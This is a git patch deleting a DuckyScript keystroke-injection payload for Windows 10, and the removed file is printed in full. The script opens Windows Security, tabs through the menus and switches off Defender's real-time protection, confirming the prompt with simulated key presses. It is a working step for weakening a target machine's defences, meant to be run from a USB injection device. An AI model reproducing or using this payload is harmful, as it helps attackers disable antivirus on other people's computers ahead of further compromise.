From 32639ed7667c118ce0d56b89ca3f828902656dae Mon Sep 17 00:00:00 2001 From: beigeworm <93350544+beigeworm@users.noreply.github.com> Date: Mon, 8 May 2023 23:16:03 +0000 Subject: [PATCH] Delete Disable RT-Protection.txt --- Disable RT-Protection.txt | 30 ------------------------------ 1 file changed, 30 deletions(-) delete mode 100644 Disable RT-Protection.txt diff --git a/Disable RT-Protection.txt b/Disable RT-Protection.txt deleted file mode 100644 index fa8c2b4..0000000 --- a/Disable RT-Protection.txt +++ /dev/null @@ -1,30 +0,0 @@ -REM Title: Disable Real-Time Protection -REM Author: @beigeworm -REM Description: Manually opens Windows Security window and turns offf Real-Time Protection. -REM Target: Windows 10 - - -REM some setup for dukie script. -DEFAULT_DELAY 100 - -REM open Windows Security GUI. -GUI r -DELAY 1500 -STRING windowsdefender:// -ENTER -DELAY 2000 - -REM run through option list and turn RT-protection off. -ENTER -TAB -TAB -TAB -TAB -ENTER -DELAY 200 -SPACE -DELAY 300 -ALT y -DELAY 400 -ALT F4 -